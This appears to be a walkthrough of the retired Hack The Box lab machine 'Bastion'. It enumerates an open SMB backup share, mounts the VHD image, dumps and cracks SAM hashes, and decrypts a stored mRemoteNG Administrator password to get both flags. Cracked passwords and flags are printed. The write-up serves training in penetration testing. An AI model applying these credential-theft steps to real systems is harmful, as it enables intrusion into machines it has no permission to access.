5 minutes
Bastion
Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.
Machine Info ¶
Bastion by L4mpje
IP: 10.10.10.134
OS: linux
Recon ¶
Nmap ¶
As usual, we kick off with a Nmap scan.
$ nmap -v -p- -T3 -oN nmap-tcp-allports 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.028s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
I run Nmap with the following parameters:
-v: run verbose (show more output)-p-: scan all ports, equals 1-65535-T3: run on normal speed (can be omitted, since this is the default speed)-oN nmap-tcp-allports: save output in normal format with said filename10.10.10.134: host to scan
Note that SSH and SMB are exposed, as well as some other irrelevant services.
SMB ¶
Let’s check out if we can find some open shares.
$ nmap --script smb-enum-shares -p 139,445 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.026s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \10.10.10.134\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access:
| Current user access:
| \10.10.10.134\Backups:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access:
| Current user access: READ
| \10.10.10.134\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access:
| Current user access:
| \10.10.10.134\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access:
|_ Current user access: READ/WRITE
As you can see, the guest account has read access on the Backups share. This sounds like something worth investigating further.
$ sudo smbmap -s Backups -R -H 10.10.10.134 -u guest | tee -a smbmap
[+] Finding open SMB ports….
[+] User SMB session establishd on 10.10.10.134…
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
Disk Permissions
---- -----------
Backups READ, WRITE
[!] Unable to remove test directory at \10.10.10.134\Backups\tzRrGnGVfe, plreae remove manually
.\
dr--r--r-- 0 Fri Aug 2 11:09:06 2019 .
dr--r--r-- 0 Fri Aug 2 11:09:06 2019 ..
-r--r--r-- 260 Fri Aug 2 11:00:50 2019 nmap-test-file
-w--w--w-- 116 Tue Apr 16 13:43:19 2019 note.txt
-r--r--r-- 0 Fri Feb 22 13:43:28 2019 SDT65CB.tmp
dr--r--r-- 0 Fri Aug 2 11:09:06 2019 tzRrGnGVfe
dr--r--r-- 0 Fri Feb 22 13:44:02 2019 WindowsImageBackup
[ ... ]
.\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 .
dr--r--r-- 0 Fri Feb 22 13:45:32 2019 ..
-r--r--r-- 37761024 Fri Feb 22 13:44:03 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-r--r--r-- 5418299392 Fri Feb 22 13:45:32 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-r--r--r-- 1186 Fri Feb 22 13:45:32 2019 BackupSpecs.xml
[ ... ]
Opening note.txt, you’ll find another clue on how you may want to continue.
$ smbclient //10.10.10.134/Backups -U guest
smb: > dir
smb: > get note.txt
smb: > exit
$ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
So we want to have a look at the back-ups.
Analysing the back-ups ¶
The small back-up file ‘9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd’ is a recovery image, which Windows usually creates when you create a back-up image.
The interesting image however is ‘9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd’. As the note said, downloading this file might fail. In my case I was never able to download more than 75% of the vhd using the get command in smbclient.
What worked for me is adding the share as a remote disk and using rsync to copy the image to my system (as rsync allows you to continue failed downloads) for analysis.
However, there are tools available which’ll allow you to browse through an image without having to download the whole image to your disk.
$ sudo mkdir /mnt/vhd
$ sudo mount -t cifs -o user=guest //10.10.10.134/Backups /mnt/vhd/
$ cd /mnt/vhd/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/
$ rsync --append 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd ~/Documents/Projects/HackTheBox_eu/134-Bastion/
$ sudo umount /mnt/vhd
$ cd ~/Documents/Projects/HackTheBox_eu/134-Bastion/
$ sudo vhdimount 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd /mnt/vhd/
$ cd /mnt/vhd/
$ ls
$ mmls -aB vhdi1
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors
Slot Start End Length Size Description
002: 000:000 0000000128 0031248511 0031248384 0014G NTFS / exFAT (0x07)
$ echo 128*512 | bc
65536
$ sudo mkdir /mnt/dd
$ sudo mount -o ro,noload,offset=65536 -t nfts vhdi1 /mnt/dd
We can now browse through the contents of the image.
Cracking hashes ¶
I start of by looking for password hashes.
These can be retrieved by cracking the SAM (Security Account Manager) file, which is located at C:\Windows\System32\config.
$ cd /mnt/dd/Windows/System32/config/
$ samdump2 SYSTEM SAM > ~/Documents/Projects/HackTheBox_eu/134-Bastion/hashes.txt
$ cat ~/Documents/Projects/HackTheBox_eu/134-Bastion/hashes.txt
*disabled * Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
$ hashcat -m 1000 -a 0 SAM-hashes.txt
$ cat ~/.hashcat/hashcat.potfile
26112010952d963c8dc4217daec986d9:bureaulampje
We now have the password of the user L4mpje (“lampje” = “small lightbulb” in Dutch), which is bureaulampje (“small desk lamp” in Dutch).
$ Got the user flag ¶
I use this password to SSH onto the box and find the users.txt file containing the flag on the user’s desktop.
$ ssh L4mpje@10.10.10.134 # enter password bureaulampje
L4mpje@BASTION C:\Users\L4mpje> type C:\Users\L4mpje\Desktop\users.txt
9bfe57d5c3309db3a151772f9d86c6cd
# Going for the root flag ¶
While browsing through the filesystem, I noticed mRemoteNG was installed.
This is also confirmed by running this small line of PowerShell:
L4mpje@BASTION C:\Users\L4mpje\Downloads> powershell
PS C:\Users\L4mpje\Downloads> Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize
DisplayName DisplayVersion Publisher InstallDate
----------- -------------- --------- -----------
mRemoteNG 1.76.11.40527 Next Generation Software 20190222
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161 Microsoft Corporation 20190416
Searching for vulnerabilities on exploit-db didn’t reveal anything,
but a quick Google search did bring me to an interesting Reddit post.
The Ruby script in the post didn’t seem to work for me, but I finally found a Python script on GitHub which did.
I downloaded confCons.xml from the host and ran the script to find the password for the Administrator account. I then logged in onto the hosting using the Administrator password to retrieve the flag from the Administrator’s desktop.
$ scp -T L4mpje@10.10.10.134:"C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml" ./
$ cat confCons.xml
$ python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
$ ssh Administrator@10.10.10.134
administrator@BASTION C:\Users\Administrator> type Desktop\root.txt
958850b91811676ed6620a9c430e65c8
Whatever you are, be a good one.
~ Abraham Lincoln